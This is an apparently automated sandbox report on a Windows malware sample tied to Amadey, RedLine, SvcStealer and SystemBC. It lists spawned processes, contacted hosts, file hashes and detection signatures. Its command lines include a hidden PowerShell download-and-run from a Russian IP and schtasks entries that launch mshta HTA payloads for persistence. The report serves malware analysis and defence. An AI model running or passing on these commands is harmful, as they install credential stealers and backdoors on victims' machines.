C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe

"C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe

"C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe"

C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe

"C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe"

C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe

"C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe

"C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe"

C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe"

C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe

"C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe"

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe

"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1956 -s 840

C:\Windows\system32\taskeng.exe

taskeng.exe {1B59A5C2-7AB5-4126-8B71-D076F3AAE697} S-1-5-21-677481364-2238709445-1347953534-1000:JXXXDSWS\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe

"C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn kFwyLmaD1dr /tr "mshta C:\Users\Admin\AppData\Local\Temp\1LIta3g1n.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\1LIta3g1n.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn kFwyLmaD1dr /tr "mshta C:\Users\Admin\AppData\Local\Temp\1LIta3g1n.hta" /sc minute /mo 25 /ru "Admin" /f

C:\ProgramData\wwasfxe\orhct.exe

C:\ProgramData\wwasfxe\orhct.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'FH0QKNVVU00PUNBK14MOJOZPXKNX5XMK.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\10097720121\am_no.cmd" "

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "lac5Tmaqt6v" /tr "mshta \"C:\Temp\0KxobPjd7.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\0KxobPjd7.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\TempFH0QKNVVU00PUNBK14MOJOZPXKNX5XMK.EXE

"C:\Users\Admin\AppData\Local\TempFH0QKNVVU00PUNBK14MOJOZPXKNX5XMK.EXE"

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\10098440101\z3SJkC5.exe

"C:\Users\Admin\AppData\Local\Temp\10098440101\z3SJkC5.exe"

C:\Windows\TEMP\{32C5EE92-B34F-4325-908A-F28FC29E7323}\.cr\z3SJkC5.exe

"C:\Windows\TEMP\{32C5EE92-B34F-4325-908A-F28FC29E7323}\.cr\z3SJkC5.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10098440101\z3SJkC5.exe" -burn.filehandle.attached=216 -burn.filehandle.self=212

C:\Windows\TEMP\{12D41D20-D467-4E85-9CBC-5B2CF86FB2AE}\.ba\WiseTurbo.exe

C:\Windows\TEMP\{12D41D20-D467-4E85-9CBC-5B2CF86FB2AE}\.ba\WiseTurbo.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 208

C:\Users\Admin\AppData\Local\Temp\10098450101\8jQumY5.exe

"C:\Users\Admin\AppData\Local\Temp\10098450101\8jQumY5.exe"

C:\Users\Admin\AppData\Local\Temp\10098460101\BXxKvLN.exe

"C:\Users\Admin\AppData\Local\Temp\10098460101\BXxKvLN.exe"

C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1932 -s 504

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1780 -s 840

C:\Users\Admin\AppData\Local\Temp\10098480101\zY9sqWs.exe

"C:\Users\Admin\AppData\Local\Temp\10098480101\zY9sqWs.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2612 -s 1040

C:\Users\Admin\AppData\Local\Temp\10016760101\files.exe

"C:\Users\Admin\AppData\Local\Temp\10016760101\files.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

Network

Country Destination Domain Proto
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
LU 45.59.120.8:80 45.59.120.8 tcp
US 8.8.8.8:53 drunkeflavorz.pw udp
US 8.8.8.8:53 explorebieology.run udp
US 172.67.179.246:443 explorebieology.run tcp
RU 185.215.113.16:80 185.215.113.16 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 185.215.113.209:80 185.215.113.209 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
RU 185.215.113.97:80 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 172.67.179.246:443 explorebieology.run tcp
RU 185.215.113.97:80 tcp
DE 5.75.210.149:443 tcp
US 8.8.8.8:53 joyfulhezart.tech udp
US 8.8.8.8:53 hardswarehub.today udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 hardrwarehaven.run udp
US 8.8.8.8:53 techmindzs.live udp
US 8.8.8.8:53 codxefusion.top udp
US 104.21.69.194:443 codxefusion.top tcp
DE 5.75.210.149:443 tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 towerbingobongoboom.com udp
US 213.209.150.137:4000 towerbingobongoboom.com tcp
US 213.209.150.137:4645 towerbingobongoboom.com tcp
US 8.8.8.8:53 gmgrn.ai udp
NL 159.223.209.104:443 gmgrn.ai tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 2.18.190.198:80 r11.o.lencr.org tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp

Files

memory/1964-0-0x0000000001330000-0x00000000017EC000-memory.dmp

memory/1964-1-0x0000000077E10000-0x0000000077E12000-memory.dmp

memory/1964-2-0x0000000001331000-0x000000000135F000-memory.dmp

memory/1964-3-0x0000000001330000-0x00000000017EC000-memory.dmp

memory/1964-5-0x0000000001330000-0x00000000017EC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

MD5 fbd20cabacee9b0def4ea7c0c7340405
SHA1 f43864031c537e45ed653c82dd3e8aef4fcf32a9
SHA256 fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7
SHA512 ceb4cb9fa7cf211f495e477ecb896852bba32bb230f825cfb0188733b80b12482d5ead72eea25ace0e032481547a6d8461c149539effde77c2cc8fa859629495

memory/1964-10-0x0000000001330000-0x00000000017EC000-memory.dmp

memory/1028-17-0x0000000000DE0000-0x000000000129C000-memory.dmp

memory/1964-15-0x0000000001330000-0x00000000017EC000-memory.dmp

memory/1028-18-0x0000000000DE1000-0x0000000000E0F000-memory.dmp

memory/1028-19-0x0000000000DE0000-0x000000000129C000-memory.dmp

memory/1028-21-0x0000000000DE0000-0x000000000129C000-memory.dmp

memory/1028-22-0x0000000000DE0000-0x000000000129C000-memory.dmp

memory/1028-23-0x0000000000DE0000-0x000000000129C000-memory.dmp

memory/1028-24-0x0000000000DE0000-0x000000000129C000-memory.dmp

memory/1028-25-0x0000000000DE0000-0x000000000129C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe

MD5 19668940080169c70b830bed8c390783
SHA1 5e6b72e52abc7d221d512111e39cbdd3f2ad40c1
SHA256 cdbc641b8c23b5699f899b408394ecfc946af9ac7a38c5d44c78a4a938e7b02c
SHA512 c322eba01ff4544b8077ec400f15ecffd3b66f89e0e0e26946224771c1ffb9c687ff4adc2e0a5e6b119766b3c8300971cfc2c990ff48346d9d3d514ab5d4bed2

memory/1028-42-0x00000000056A0000-0x000000000573F000-memory.dmp

memory/2748-44-0x000000013F240000-0x000000013F2DF000-memory.dmp

memory/1028-41-0x00000000056A0000-0x000000000573F000-memory.dmp

memory/1028-40-0x0000000000DE0000-0x000000000129C000-memory.dmp

memory/1180-52-0x0000000002EE0000-0x0000000002F85000-memory.dmp

memory/2748-51-0x000000013F240000-0x000000013F2DF000-memory.dmp

memory/1180-47-0x0000000002EE0000-0x0000000002F85000-memory.dmp

memory/1180-45-0x0000000002EE0000-0x0000000002F85000-memory.dmp

memory/1028-54-0x00000000056A0000-0x000000000573F000-memory.dmp

memory/1028-53-0x0000000000DE0000-0x000000000129C000-memory.dmp

memory/1028-55-0x00000000056A0000-0x000000000573F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe

MD5 e82c4c3f7a2994eeecc1f81a5e4a4180
SHA1 660820f778073332dcd5ec446d2fcf00de887abd
SHA256 11eec5d71c7fadae9d7176448d8fff3de44ec8d3b4df86f0eca59e06adf202d3
SHA512 4d3e42e68b9fa6330edfee677ad55ae24964c33d6fd2d25ba6c2876d80f8d9cbc999c6e27192ce58a45559d00b3c0bc71ddbee1ad8d6fd7083b705ef5cf84d76

memory/1028-71-0x0000000000DE0000-0x000000000129C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe

MD5 02579a797e919dcaf5758fbcbe34b093
SHA1 7668fff0888f4c7ad7a83b24f8c6d4009c10e534
SHA256 0a63a310dfc4ce680c96f72f5b9c9559f9e6d9c3d99f48c8782ee43c56a8728c
SHA512 2b99b620ca06f03a1924c0ab2feef96142df6ff16558d30c37e8b3e5602e5d5b2ecd4e7bd3b4499ef64a0eb32cb136821442e79b3aa66caf42467c749116e5f5

C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe

MD5 f53198e8b444658cf7134f5ccb466a98
SHA1 0283e56ed7201eecfc7dad30cc6f3f30d677be66
SHA256 936004bbb9d3c4763c0e36cc887b21315ae6c2d55c366cb3b3390d480b827107
SHA512 ee40f63f7b75cc1b55d11c56c25086d2d66ae86a3f65326d5a75cf0f2fac94ebee622cd4844b4f6468b2bfd011ab80558f41e1b62d2a7864b0ce7f61d3bdcf09

memory/1976-112-0x0000000000400000-0x0000000000823000-memory.dmp

memory/1012-111-0x00000000044B0000-0x00000000048D3000-memory.dmp

memory/1012-110-0x00000000044B0000-0x00000000048D3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe

MD5 dab2bc3868e73dd0aab2a5b4853d9583
SHA1 3dadfc676570fc26fc2406d948f7a6d4834a6e2c
SHA256 388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb
SHA512 3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8

memory/1028-120-0x0000000000DE0000-0x000000000129C000-memory.dmp

memory/1028-136-0x00000000068D0000-0x0000000006FBE000-memory.dmp

memory/1028-135-0x00000000068D0000-0x0000000006FBE000-memory.dmp

memory/1956-130-0x0000000000390000-0x00000000003F5000-memory.dmp

memory/872-137-0x0000000000FD0000-0x00000000016BE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe

MD5 22892b8303fa56f4b584a04c09d508d8
SHA1 e1d65daaf338663006014f7d86eea5aebf142134
SHA256 87618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062f
SHA512 852dcc1470f33bc601a814f61a37c1f5a10071ff3354f101be0ef9aa5ac62b4433a732d02acd4247c2a1819fef9adef7dd6722ee8eb9e8501bac033eb877c744

memory/1976-161-0x0000000000400000-0x0000000000823000-memory.dmp

memory/1012-160-0x00000000044B0000-0x00000000048D3000-memory.dmp

memory/1012-159-0x00000000044B0000-0x00000000048D3000-memory.dmp

memory/1976-167-0x0000000000400000-0x0000000000823000-memory.dmp

memory/1028-168-0x0000000000DE0000-0x000000000129C000-memory.dmp

memory/872-175-0x0000000000FD0000-0x00000000016BE000-memory.dmp

memory/1028-174-0x00000000068D0000-0x0000000006FBE000-memory.dmp

memory/1028-173-0x00000000068D0000-0x0000000006FBE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe

MD5 d3f6417157848636b4ce0ee7d1c4db22
SHA1 413031d39ae68a0f838fb19ca90b126b17bc6cae
SHA256 5da6cfd7a904824943ea08f5945f68fc4e8b882d973b48efffd976c3361a3638
SHA512 781b65e94e004fc798494550462aecafc57f0cf70943f5e0bbd33706a27f4325e00bf9f0ef3de9b447fa4a5cb3f533f1ee053974589614698003d6bb37af4fad

memory/1968-194-0x0000000000400000-0x0000000000823000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1LIta3g1n.hta

MD5 1a2bf8ed4b6d5c09887ef06f8450515a
SHA1 d4a873924fb314a6338af97d8b27c9f2eea60d29
SHA256 031e82d4a4f991883a96338a71525e55dc59e3a1612dcb6037b288530e8242f2
SHA512 91d8e66f01cc1645c411633653799c0ef6c8d8504a8888aa9c4072468fec659ab2c185c059ac4d5bc72231187cd154535301cd150f26d06c42b698fa57800b24

C:\Users\Admin\AppData\Local\Temp\10097720121\am_no.cmd

MD5 cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1 b0db8b540841091f32a91fd8b7abcd81d9632802
SHA256 5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512 ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

memory/1976-218-0x0000000000400000-0x0000000000823000-memory.dmp

memory/1028-239-0x0000000000DE0000-0x000000000129C000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Windows\Tasks\Test Task17.job

MD5 9c2b9bb568984fdf53b3fd73b085decb
SHA1 55f4322f8724e80e3ec9dcba3f210c7408ffe325
SHA256 a28c81d263b90d206047cafabc22bb83f24e2afed401f47a38daf22bc755db0d
SHA512 816107fd9c862a46918c0ddf9f76e4a3fdb57d52b1fe53acde5d76487a8ee178a987d2b2d4793b706794150bc50f79c6eba78f0f8ed5e6eae4c8b539baea043b

C:\Users\Admin\AppData\Local\Temp\TarAAC7.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 b8cae2557ae6ef7784cb010d3ea61b6e
SHA1 92f14d315ccac7bb363a1de0f64c37dc09e09d2b
SHA256 75c2adda116afa77ad39605b8719e12fced4fb66892a08e4184f47437cc07859
SHA512 08ea7f0e503c798a484159e660c096173d2b815f3d1ac771eb7b42100c239d341f333eca213fd2ce7b60c557e1cb820e7cac5269246efa61cf8b6957f84885e7

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Temp\0KxobPjd7.hta

MD5 39c8cd50176057af3728802964f92d49
SHA1 68fc10a10997d7ad00142fc0de393fe3500c8017
SHA256 f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84
SHA512 cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

memory/1968-296-0x0000000000400000-0x0000000000823000-memory.dmp

C:\Users\Admin\AppData\Local\TempFH0QKNVVU00PUNBK14MOJOZPXKNX5XMK.EXE

MD5 17de498486ab8389b310d0ea6b5ffe33
SHA1 e01dc56faffd68ab1d6675ff7c82c5fc1349fafb
SHA256 e465b0d4b8f9d028e868558a8c232ac440e7812b1aa4530ad373d05aa149f3e1
SHA512 7daa8eb5ae9265c7530f0688ad4f617727921db34b4e7afff0b3b6ed32a119fa0f0ab5b287fabe2455fd17467689ffaf23fb9772d9dc1e7205fb518c273798e5

memory/2524-308-0x0000000000F80000-0x0000000001443000-memory.dmp

memory/396-307-0x00000000064B0000-0x0000000006973000-memory.dmp

memory/2524-310-0x0000000000F80000-0x0000000001443000-memory.dmp

memory/396-306-0x00000000064B0000-0x0000000006973000-memory.dmp

memory/1976-371-0x0000000000400000-0x0000000000823000-memory.dmp

memory/1028-372-0x0000000000DE0000-0x000000000129C000-memory.dmp

memory/1044-381-0x0000000006580000-0x0000000006A43000-memory.dmp

memory/1044-382-0x0000000006580000-0x0000000006A43000-memory.dmp

memory/2388-384-0x00000000011F0000-0x00000000016B3000-memory.dmp

memory/2388-386-0x00000000011F0000-0x00000000016B3000-memory.dmp

memory/1968-387-0x0000000000400000-0x0000000000823000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10098440101\z3SJkC5.exe

MD5 001d7acad697c62d8a2bd742c4955c26
SHA1 840216756261f1369511b1fd112576b3543508f7
SHA256 de53f6f359af6ccc361faf2aa74690c9575b987a01f1250a6eb042cf9d4ea4af
SHA512 f06039d1d7ad28a04877e4eabb6fb7a5137a0040b8c316bee502bce6c68058bfe62db9480674bb69c9aeabae34304adeeff86dc3a8427929d00a842d2f2e80eb

C:\Windows\TEMP\{32C5EE92-B34F-4325-908A-F28FC29E7323}\.cr\z3SJkC5.exe

MD5 eff9e9d84badf4b9d4c73155d743b756
SHA1 fd0ad0c927617a3f7b7e1df2f5726259034586af
SHA256 d61ef1bfa73bd5b013066d86f1c41e33bb396fc547cf5ab7191f56cc7b463aad
SHA512 0006273c86e8130e06e705a2be46c3433c0d1b34463123354c1857ebf88503d6e7e90602dc40960351baa03155074f8c5834b251be9da90fd95b10e498a98a19

\Windows\Temp\{12D41D20-D467-4E85-9CBC-5B2CF86FB2AE}\.ba\Quadrisyllable.dll

MD5 a1e561bc201a14277dfc3bf20d1a6cd7
SHA1 1895fd97fb75ad6b59fc6d2222cf36b7dc608b29
SHA256 7ae39cb5cd14a875af3e43df4a309d6a7a44c0339c413bf21b0300c84e35b66c
SHA512 aaa4e7350094dc7574e5f18ce619f48a45062674353f0f2a340a1fea0055c7961a9b257455d8ea877d739635e3444df08f049484f48fa9729d8fb1667374cf3c

C:\Windows\Temp\{12D41D20-D467-4E85-9CBC-5B2CF86FB2AE}\.ba\WiseTurbo.exe

MD5 1f166f5c76eb155d44dd1bf160f37a6a
SHA1 cd6f7aa931d3193023f2e23a1f2716516ca3708c
SHA256 2d13424b09ba004135a26ccd60b64cdd6917d80ce43070cbc114569eae608588
SHA512 38ad8f1308fe1aae3ddf7dbc3b1c5442663571137390b3e31e2527b8fec70e7266b06df295df0c411fcc500424022f274fd467d36040def2e1a4feff88c749b7

memory/1976-430-0x0000000000400000-0x0000000000823000-memory.dmp

memory/1028-443-0x0000000000DE0000-0x000000000129C000-memory.dmp

memory/1968-445-0x0000000000400000-0x0000000000823000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10098460101\BXxKvLN.exe

MD5 971c0e70de5bb3de0c9911cf96d11743
SHA1 43badfc19a7e07671817cf05b39bc28a6c22e122
SHA256 67c9bb968cd0de2bfb2c24b00cfb2b98ac7403135ea47d98961652518584e45d
SHA512 a46523d8c71c0df25a043e2250ee1b6792e147314ec2097870a7972c892fd1a2022994f10823dadf54f161d11e808251b85a18efb9db9450d97af4b2f173f3c2

memory/1336-455-0x0000000010000000-0x00000000100E1000-memory.dmp

memory/1336-454-0x0000000000400000-0x0000000000D48000-memory.dmp

memory/1976-456-0x0000000000400000-0x0000000000823000-memory.dmp

memory/1028-458-0x0000000000DE0000-0x000000000129C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe

MD5 b60779fb424958088a559fdfd6f535c2
SHA1 bcea427b20d2f55c6372772668c1d6818c7328c9
SHA256 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221
SHA512 c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

memory/1780-460-0x0000000000180000-0x00000000001E5000-memory.dmp

memory/1932-476-0x0000000000AC0000-0x0000000000B20000-memory.dmp

memory/1264-495-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1264-494-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1264-496-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1264-492-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1264-490-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1264-486-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1512-497-0x000000013FF80000-0x000000014012E000-memory.dmp

memory/1264-484-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1264-482-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1264-480-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1264-478-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1264-488-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1968-498-0x0000000000400000-0x0000000000823000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10098480101\zY9sqWs.exe

MD5 2bb133c52b30e2b6b3608fdc5e7d7a22
SHA1 fcb19512b31d9ece1bbe637fe18f8caf257f0a00
SHA256 b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630
SHA512 73229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f

memory/1976-511-0x0000000000400000-0x0000000000823000-memory.dmp

memory/1028-512-0x0000000000DE0000-0x000000000129C000-memory.dmp

memory/1968-513-0x0000000000400000-0x0000000000823000-memory.dmp

memory/1976-515-0x0000000000400000-0x0000000000823000-memory.dmp

memory/1028-516-0x0000000000DE0000-0x000000000129C000-memory.dmp

memory/1968-517-0x0000000000400000-0x0000000000823000-memory.dmp

memory/1028-578-0x0000000000DE0000-0x000000000129C000-memory.dmp

memory/872-579-0x00000000001D0000-0x000000000022F000-memory.dmp

memory/872-584-0x0000000000FD0000-0x00000000016BE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10016760101\files.exe

MD5 434f706017b7f673ed5586f1470d7d28
SHA1 f431be69eab7bec0c1752f54977e32fd60278617
SHA256 a6b647b49538fe599002c116ee5cd79c7e2d472cb48b24b1dfcf9a2718088c2a
SHA512 d019cb403225f85f5344fb94da6257b216baa5b66000821a0357b03db9da555e51a6cfad576570bfc62f0db8077d92af9793843d48b0e1045ede79e14c4222d7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4814be9121d3c13bfe7b4485d5949fe4
SHA1 50521abbc061dd6f68f847a9b506aa454751d3b3
SHA256 7bb21ccc8d0db57952c6b01582b30db7ec4fad537ac35fb1cd54ae27bedd4118
SHA512 08ffad0466efe9a75143252bfae9776adda356ce1215db531b6be3a6fbdc6e9539f899265b5cfbd6b01a8e38f3cab73b4b0774c87bc49b05cf2fe2baab3ed2dd

Analysis: behavioral2

Detonation Overview

Submitted

2025-03-05 04:09

Reported

2025-03-05 04:11

Platform

win10v2004-20250217-en

Max time kernel

150s

Max time network

151s

Command Line

sihost.exe

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detects SvcStealer Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 4260 created 2604 N/A C:\Users\Admin\AppData\Local\Temp\10016760101\files.exe C:\Windows\system32\sihost.exe

SvcStealer, Diamotrix

stealer downloader svcstealer

Svcstealer family

svcstealer

SystemBC

trojan systembc

Systembc family

systembc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempS64C989GJ0FPUV1K4MVV4RBHH8OOEWH3.EXE N/A
